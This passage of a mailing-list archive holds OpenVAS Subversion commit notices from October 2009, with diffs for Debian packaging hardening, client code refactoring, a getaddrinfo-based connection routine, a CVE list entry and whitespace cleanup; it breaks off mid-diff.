01:22:11 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:22:11 +0200 (CEST) Subject: [Openvas-commits] r5421 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006232211.01B47861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:22:05 +0200 (Wed, 07 Oct 2009) New Revision: 5421 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 23:22:05 UTC (rev 5421) @@ -1,12 +1,16 @@ openvas-scanner (3.0.0.beta3-1) UNRELEASED; urgency=low + [ Michael Wiegand ] * New upstream release. * control: Bumped openvas-libraries dependency. * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). - -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + [ Tim Brown ] + * Enable hardening-wrapper. + -- Tim Brown Wed, 07 Oct 2009 00:20:52 +0100 + openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 23:22:05 UTC (rev 5421) @@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch +Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules 2009-10-06 23:18:00 UTC (rev 5420) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/rules 2009-10-06 23:22:05 UTC (rev 5421) @@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 01:27:22 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:27:22 +0200 (CEST) Subject: [Openvas-commits] r5423 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091006232722.6A503861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:27:17 +0200 (Wed, 07 Oct 2009) New Revision: 5423 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 23:27:17 UTC (rev 5423) @@ -1,11 +1,15 @@ openvas-libraries (3.0.0-beta3) UNRELEASED; urgency=low - * New upstream release. - * rules: Set sysconfdir at configure time. - * control: Bumped cmake dependency since it was raised upstream. + [ Michael Wiegand ] + * New upstream release + * rules: Set sysconfdir at configure time + * control: Bumped cmake dependency since it was raised upstream - -- Michael Wiegand Tue, 06 Oct 2009 12:06:19 +0200 + [ Tim Brown ] + * Enable hardening-wrapper + -- Tim Brown Wed, 07 Oct 2009 00:25:58 +0100 + openvas-libraries (3.0.0-beta2) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 23:27:17 UTC (rev 5423) @@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev +Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 23:20:52 UTC (rev 5422) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 23:27:17 UTC (rev 5423) @@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 09:01:42 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 09:01:42 +0200 (CEST) Subject: [Openvas-commits] r5424 - in trunk/openvas-plugins: . scripts Message-ID: <20091007070142.33E22852B45B@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 09:01:34 +0200 (Wed, 07 Oct 2009) New Revision: 5424 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/webmirror.nasl Log: * scripts/webmirror.nasl: Added more information about the origin of the script. Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 23:27:17 UTC (rev 5423) +++ trunk/openvas-plugins/ChangeLog 2009-10-07 07:01:34 UTC (rev 5424) @@ -1,3 +1,8 @@ +2009-10-07 Jan-Oliver Wagner + + * scripts/webmirror.nasl: Added more information about + the origin of the script. + 2009-10-06 Michael Meyer * scripts/flatpress_36543.nasl, Modified: trunk/openvas-plugins/scripts/webmirror.nasl =================================================================== --- trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-06 23:27:17 UTC (rev 5423) +++ trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-07 07:01:34 UTC (rev 5424) @@ -6,6 +6,7 @@ # # Saved from # http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl +# (nessus internal revision 1.86 released with 2.2.0 in November 2004 under GNU GPL terms) # # Authors: # Renaud Deraison . From scm-commit at wald.intevation.org Wed Oct 7 12:31:20 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:31:20 +0200 (CEST) Subject: [Openvas-commits] r5425 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091007103120.96395865F4A5@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 12:31:15 +0200 (Wed, 07 Oct 2009) New Revision: 5425 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert NULL returns to ints. Use show_error instead of show_error_and_wait. Add missing success return. Put the final g_free in an else. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 07:01:34 UTC (rev 5424) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:31:15 UTC (rev 5425) @@ -1,3 +1,9 @@ +2009-10-07 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert + NULL returns to ints. Use show_error instead of show_error_and_wait. + Add missing success return. Put the final g_free in an else. + 2009-10-06 Jan-Oliver Wagner * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 07:01:34 UTC (rev 5424) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:31:15 UTC (rev 5425) @@ -1049,34 +1049,37 @@ pwd = open (".", O_RDONLY); if (pwd == -1) { - show_error_and_wait (_("%s: failed to open current directory"), - __FUNCTION__); - return NULL; + show_error (_("%s: failed to open current directory"), + __FUNCTION__); + return -6; } if (chdir (*scope_dir_name)) { - show_error_and_wait (_("%s: failed to chdir to %s"), - context->dir, - __FUNCTION__); - return NULL; + show_error (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return -6; } if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) { - show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), - __FUNCTION__); - return NULL; + show_error (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return -6; } if (fchdir (pwd)) - show_error_and_wait (_("%s: failed to fchdir back to previous dir"), - __FUNCTION__); + show_error (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); close (pwd); + + return 0; } } - g_free (servers_dir_name); + else + g_free (servers_dir_name); show_error (_("%s: check_is_dir"), __FUNCTION__); return -1; From scm-commit at wald.intevation.org Wed Oct 7 12:37:31 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:37:31 +0200 (CEST) Subject: [Openvas-commits] r5426 - trunk/openvas-client Message-ID: <20091007103731.82C898518D86@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 12:37:26 +0200 (Wed, 07 Oct 2009) New Revision: 5426 Modified: trunk/openvas-client/ChangeLog Log: * ChangeLog: Mark USE_OMP in last few logs. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:31:15 UTC (rev 5425) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:37:26 UTC (rev 5426) @@ -1,9 +1,14 @@ 2009-10-07 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Convert - NULL returns to ints. Use show_error instead of show_error_and_wait. - Add missing success return. Put the final g_free in an else. + * ChangeLog: Mark USE_OMP in last few logs. +2009-10-07 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Convert NULL returns to ints. Use show_error instead of + show_error_and_wait. Add missing success return. Put the final g_free in + an else. + 2009-10-06 Jan-Oliver Wagner * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed @@ -11,19 +16,20 @@ 2009-10-06 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink - NVT cache instead of copying it. Turn off saving of report NVT cache. + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Symlink NVT cache instead of copying it. Turn off saving of report NVT + cache. - * openvas/context.c (context_new): Symlink NVT to parent cache instead of - saving cache to disk. + * openvas/context.c (context_new) [USE_OMP]: Symlink NVT to parent cache + instead of saving cache to disk. 2009-10-06 Matthew Mundell - * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove - verbose flag setting. Correct indentation. + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh) [USE_OMP]: + Remove verbose flag setting. Correct indentation. - * openvas/openvas-client.c (refresh_server): Save context to disk - afterwards, so that new scopes can copy it. + * openvas/openvas-client.c [USE_OMP] (refresh_server): Save context to + disk afterwards, so that new scopes can copy it. 2009-10-02 Felix Wolfsteller From scm-commit at wald.intevation.org Wed Oct 7 12:49:45 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:49:45 +0200 (CEST) Subject: [Openvas-commits] r5427 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091007104945.C8198851A581@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 12:49:43 +0200 (Wed, 07 Oct 2009) New Revision: 5427 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/pdf_output.c trunk/openvas-client/openvas/preferences.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/context.c (context_collect, context_new, context_add, context_collect_servers), openvas/openvas-client.c (main), openvas/pdf_output.c (arglist_to_pdf), openvas/preferences.c (prefs_get_default), openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Renamed key "nessus_dir" to "openvas_dir". Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:49:43 UTC (rev 5427) @@ -1,3 +1,12 @@ +2009-10-07 Jan-Oliver Wagner + + * openvas/context.c (context_collect, context_new, context_add, + context_collect_servers), openvas/openvas-client.c (main), + openvas/pdf_output.c (arglist_to_pdf), + openvas/preferences.c (prefs_get_default), + openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): + Renamed key "nessus_dir" to "openvas_dir". + 2009-10-07 Matthew Mundell * ChangeLog: Mark USE_OMP in last few logs. Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/context.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -520,22 +520,22 @@ void context_collect (struct context *context) { - const char *dir = estrdup (prefs_get_string (context, "nessus_dir")); + const char *dir = estrdup (prefs_get_string (context, "openvas_dir")); context_collect_recurse (context, dir); } #ifdef USE_OMP /** - * @brief Recursively collects server contexts found in and under the nessus_dir. + * @brief Recursively collects server contexts found in and under the openvas_dir. * - * @param context Is queried for the nessus_dir preference, found server + * @param context Is queried for the openvas_dir preference, found server * contexts are added to it under .Servers. */ void context_collect_servers (struct context *context) { /** @todo use glibs path building functions (instead of strcat) */ - const char *dir = prefs_get_string (context, "nessus_dir"); + const char *dir = prefs_get_string (context, "openvas_dir"); char *sdir = emalloc (strlen (dir) + strlen ("/.Servers") + 1); strcpy (sdir, dir); @@ -760,7 +760,7 @@ if (parent->dir) dir = parent->dir; else - dir = prefs_get_string (parent, "nessus_dir"); + dir = prefs_get_string (parent, "openvas_dir"); if(!check_is_dir(dir) && (mkdir(dir, 0700) < 0)) { @@ -924,7 +924,7 @@ if(parent->dir) dir = parent->dir; else - dir = prefs_get_string(parent, "nessus_dir"); + dir = prefs_get_string(parent, "openvas_dir"); if(!check_is_dir(dir) && (mkdir(dir, 0700) < 0)) { Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -1458,7 +1458,7 @@ #ifdef USE_OMP if(!quiet_mode) { - const char *dir = prefs_get_string (Global, "nessus_dir"); + const char *dir = prefs_get_string (Global, "openvas_dir"); gchar *servers_dir = g_build_filename (dir, "/.Servers", NULL); if (g_mkdir_with_parents (servers_dir, 0700)) Modified: trunk/openvas-client/openvas/pdf_output.c =================================================================== --- trunk/openvas-client/openvas/pdf_output.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/pdf_output.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -265,7 +265,7 @@ NULL, "bin\\htmldoc.exe"); #endif /* CYGWIN */ - const char *openvas_dir = estrdup (prefs_get_string(Global, "nessus_dir")); + const char *openvas_dir = estrdup (prefs_get_string(Global, "openvas_dir")); snprintf(tmpfname, PATH_MAX, "%s/.openvas_%d_pdf", openvas_dir, getpid()); Modified: trunk/openvas-client/openvas/preferences.c =================================================================== --- trunk/openvas-client/openvas/preferences.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/preferences.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -659,7 +659,7 @@ return (void *)OPENVAS_IANA_OTP_PORT; else if (!strcmp(name, "ssl_version")) return SSL_VER_DEF_NAME; - else if (!strcmp(name, "nessus_dir")) + else if (!strcmp(name, "openvas_dir")) { static char *openvas_dir; if (!openvas_dir) Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:37:26 UTC (rev 5426) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 10:49:43 UTC (rev 5427) @@ -940,7 +940,7 @@ gchar* file_name; gboolean ok; - servers_dir_name = g_build_filename (prefs_get_string (context, "nessus_dir"), + servers_dir_name = g_build_filename (prefs_get_string (context, "openvas_dir"), ".Servers", NULL); if (check_is_dir (servers_dir_name)) From scm-commit at wald.intevation.org Wed Oct 7 12:57:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 12:57:01 +0200 (CEST) Subject: [Openvas-commits] r5428 - in trunk/openvas-client: . openvas Message-ID: <20091007105701.65FCE861EAAA@pyrosoma.intevation.org> Author: jan Date: 2009-10-07 12:56:59 +0200 (Wed, 07 Oct 2009) New Revision: 5428 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/openvas-client.h Log: * openvas/openvas-client.c (connect_to_scanner): Changed return value to be const. * openvas/openvas-client.c: Updated proto accordingly. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/ChangeLog 2009-10-07 10:56:59 UTC (rev 5428) @@ -1,5 +1,12 @@ 2009-10-07 Jan-Oliver Wagner + * openvas/openvas-client.c (connect_to_scanner): Changed + return value to be const. + + * openvas/openvas-client.c: Updated proto accordingly. + +2009-10-07 Jan-Oliver Wagner + * openvas/context.c (context_collect, context_new, context_add, context_collect_servers), openvas/openvas-client.c (main), openvas/pdf_output.c (arglist_to_pdf), Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-07 10:56:59 UTC (rev 5428) @@ -684,8 +684,7 @@ * * @return NULL in case of success, error message text otherwise. */ -// FIX const? -char * +const char * connect_to_scanner (struct context * context) { const char * hostname; Modified: trunk/openvas-client/openvas/openvas-client.h =================================================================== --- trunk/openvas-client/openvas/openvas-client.h 2009-10-07 10:49:43 UTC (rev 5427) +++ trunk/openvas-client/openvas/openvas-client.h 2009-10-07 10:56:59 UTC (rev 5428) @@ -32,8 +32,7 @@ #include "context.h" -// FIX const? -char * connect_to_scanner(struct context *); +const char * connect_to_scanner(struct context *); #ifdef USE_OMP const char * refresh_server (struct context *); #endif From scm-commit at wald.intevation.org Wed Oct 7 15:24:11 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:24:11 +0200 (CEST) Subject: [Openvas-commits] r5429 - in trunk/openvas-libraries: . misc Message-ID: <20091007132411.699EF80CF8D2@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:24:10 +0200 (Wed, 07 Oct 2009) New Revision: 5429 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/openvas_server.c Log: * misc/openvas_server.c (openvas_server_open): Create address with getaddrinfo. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-07 10:56:59 UTC (rev 5428) +++ trunk/openvas-libraries/ChangeLog 2009-10-07 13:24:10 UTC (rev 5429) @@ -1,3 +1,8 @@ +2009-10-07 Matthew Mundell + + * misc/openvas_server.c (openvas_server_open): Create address with + getaddrinfo. + 2009-10-06 Tim Brown * misc/network.c, misc/openvas_auth.c, nasl/nasl_scanner_glue.c Modified: trunk/openvas-libraries/misc/openvas_server.c =================================================================== --- trunk/openvas-libraries/misc/openvas_server.c 2009-10-07 10:56:59 UTC (rev 5428) +++ trunk/openvas-libraries/misc/openvas_server.c 2009-10-07 13:24:10 UTC (rev 5429) @@ -38,7 +38,10 @@ #include #include #include +#include #include +#include +#include #include #include "openvas_server.h" @@ -72,8 +75,13 @@ openvas_server_open (gnutls_session_t * session, const char *host, int port) { + int server_socket; + struct addrinfo address_hints; + struct addrinfo *addresses, *address; + gchar *port_string; + /** @todo Ensure that host and port have sane values. */ - /** @todo Improve logging.*/ + /** @todo Improve logging. */ /* Turn off use of /dev/random, as this can block. */ @@ -88,54 +96,31 @@ return -1; } - /* Setup address. */ - - address.sin_family = AF_INET; - - address.sin_port = htons (port); - - if (!inet_aton (host, &address.sin_addr)) - { - g_message ("Failed to create server address %s.", - host); - return -1; - } - - g_message (" Set to connect to address %s port %i", - host, - ntohs (address.sin_port)); - - /* Make server socket. */ - - int server_socket = socket (PF_INET, SOCK_STREAM, 0); - if (server_socket == -1) - { - g_message ("Failed to create server socket"); - return -1; - } - /* Setup server session. */ - /** @todo Use openvas_server_session_new. */ + /** @todo Use openvas_server_new. */ gnutls_certificate_credentials_t credentials; if (gnutls_certificate_allocate_credentials (&credentials)) { g_message ("Failed to allocate server credentials."); - goto close_fail; + return -1; } // FIX always a client? if (gnutls_init (session, GNUTLS_CLIENT)) { g_message ("Failed to initialise server session."); - goto server_free_fail; + gnutls_certificate_free_credentials (credentials); + return -1; } if (gnutls_set_default_priority (*session)) { g_message ("Failed to set server session priority."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } const int kx_priority[] = { GNUTLS_KX_DHE_RSA, @@ -145,7 +130,9 @@ if (gnutls_kx_set_priority (*session, kx_priority)) { g_message ("Failed to set server key exchange priority."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } if (gnutls_credentials_set (*session, @@ -153,19 +140,71 @@ credentials)) { g_message ("Failed to set server credentials."); - goto server_fail; + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } - /** @todo Use openvas_server_connect. */ + /* Create the port string. */ - /* Connect to server. */ + port_string = g_strdup_printf ("%i", port); - if (connect (server_socket, - (struct sockaddr *) &address, - sizeof (struct sockaddr_in)) - == -1) + /* Get all possible addresses. */ + + memset (&address_hints, 0, sizeof (address_hints)); + address_hints.ai_family = AF_UNSPEC; /* IPv4 or IPv6. */ + address_hints.ai_socktype = SOCK_STREAM; + address_hints.ai_flags = AI_NUMERICSERV; + address_hints.ai_protocol = 0; + + if (getaddrinfo (host, port_string, &address_hints, &addresses)) { + g_free (port_string); + g_message ("Failed to get server addresses for %s: %s", + host, + gai_strerror (errno)); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; + } + g_free (port_string); + + /* Try to connect to each address in turn. */ + + for (address = addresses; address; address = address->ai_next) + { + /* Make server socket. */ + + server_socket = socket (PF_INET, SOCK_STREAM, 0); + if (server_socket == -1) + { + g_message ("Failed to create server socket"); + freeaddrinfo (addresses); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; + } + + /** @todo Use openvas_server_connect. */ + + /* Connect to server. */ + + if (connect (server_socket, address->ai_addr, address->ai_addrlen) + == -1) + { + close (server_socket); + continue; + } + break; + } + + freeaddrinfo (addresses); + + if (address == NULL) + { g_message ("Failed to connect to server"); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); return -1; } @@ -187,22 +226,14 @@ gnutls_perror (ret); if (shutdown (server_socket, SHUT_RDWR) == -1) g_message ("Failed to shutdown server socket"); - goto server_fail; + close (server_socket); + gnutls_deinit (*session); + gnutls_certificate_free_credentials (credentials); + return -1; } g_message (" Shook hands with server."); return server_socket; - - server_fail: - gnutls_deinit (*session); - - server_free_fail: - gnutls_certificate_free_credentials (credentials); - - close_fail: - close (server_socket); - - return -1; } /** From scm-commit at wald.intevation.org Wed Oct 7 15:42:46 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:42:46 +0200 (CEST) Subject: [Openvas-commits] r5430 - trunk/openvas-plugins Message-ID: <20091007134246.38C97861EAD7@pyrosoma.intevation.org> Author: chandra Date: 2009-10-07 15:42:46 +0200 (Wed, 07 Oct 2009) New Revision: 5430 Modified: trunk/openvas-plugins/cve_current.txt Log: Updated cve current Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-07 13:24:10 UTC (rev 5429) +++ trunk/openvas-plugins/cve_current.txt 2009-10-07 13:42:46 UTC (rev 5430) @@ -111,4 +111,5 @@ CVE-2009-3484 SecPod 36543 Greenbone svn R 36391 Greenbone svn R +CVE-2009-3545 SecPod From scm-commit at wald.intevation.org Wed Oct 7 15:52:36 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:52:36 +0200 (CEST) Subject: [Openvas-commits] r5431 - in trunk/openvas-client: . openvas Message-ID: <20091007135236.2B5B5861EAB4@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:52:30 +0200 (Wed, 07 Oct 2009) New Revision: 5431 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c Log: * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new scopes "unnamed task". Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:42:46 UTC (rev 5430) +++ trunk/openvas-client/ChangeLog 2009-10-07 13:52:30 UTC (rev 5431) @@ -1,3 +1,8 @@ +2009-10-07 Matthew Mundell + + * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new + scopes "unnamed task". + 2009-10-07 Jan-Oliver Wagner * openvas/openvas-client.c (connect_to_scanner): Changed @@ -12,7 +17,7 @@ openvas/pdf_output.c (arglist_to_pdf), openvas/preferences.c (prefs_get_default), openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): - Renamed key "nessus_dir" to "openvas_dir". + Renamed key "nessus_dir" to "openvas_dir". 2009-10-07 Matthew Mundell Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-07 13:42:46 UTC (rev 5430) +++ trunk/openvas-client/openvas/context.c 2009-10-07 13:52:30 UTC (rev 5431) @@ -826,7 +826,11 @@ name = _("unnamed task"); break; case CONTEXT_SCOPE: +#ifndef DISABLE_OTP name = _("unnamed scope"); +#else + name = _("unnamed task"); +#endif break; default: show_error(_("context_new(): No name provided for context")); @@ -1027,7 +1031,11 @@ name = _("unnamed task"); break; case CONTEXT_SCOPE: +#ifndef DISABLE_OTP name = _("unnamed scope"); +#else + name = _("unnamed task"); +#endif break; default: show_error(_("context_new(): No name provided for context")); From scm-commit at wald.intevation.org Wed Oct 7 15:57:35 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 15:57:35 +0200 (CEST) Subject: [Openvas-commits] r5432 - in trunk/openvas-client: . openvas Message-ID: <20091007135735.974799503ABF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 15:57:34 +0200 (Wed, 07 Oct 2009) New Revision: 5432 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/cli.c Log: * openvas/cli.c: Flush trailing whitespace. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:52:30 UTC (rev 5431) +++ trunk/openvas-client/ChangeLog 2009-10-07 13:57:34 UTC (rev 5432) @@ -1,5 +1,9 @@ 2009-10-07 Matthew Mundell + * openvas/cli.c: Flush trailing whitespace. + +2009-10-07 Matthew Mundell + * openvas/context.c (context_new, context_add) [DISABLE_OMP]: Name new scopes "unnamed task". Modified: trunk/openvas-client/openvas/cli.c =================================================================== --- trunk/openvas-client/openvas/cli.c 2009-10-07 13:52:30 UTC (rev 5431) +++ trunk/openvas-client/openvas/cli.c 2009-10-07 13:57:34 UTC (rev 5432) @@ -15,8 +15,8 @@ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * * cli.c - Command Line Interface manager - * - * modified by 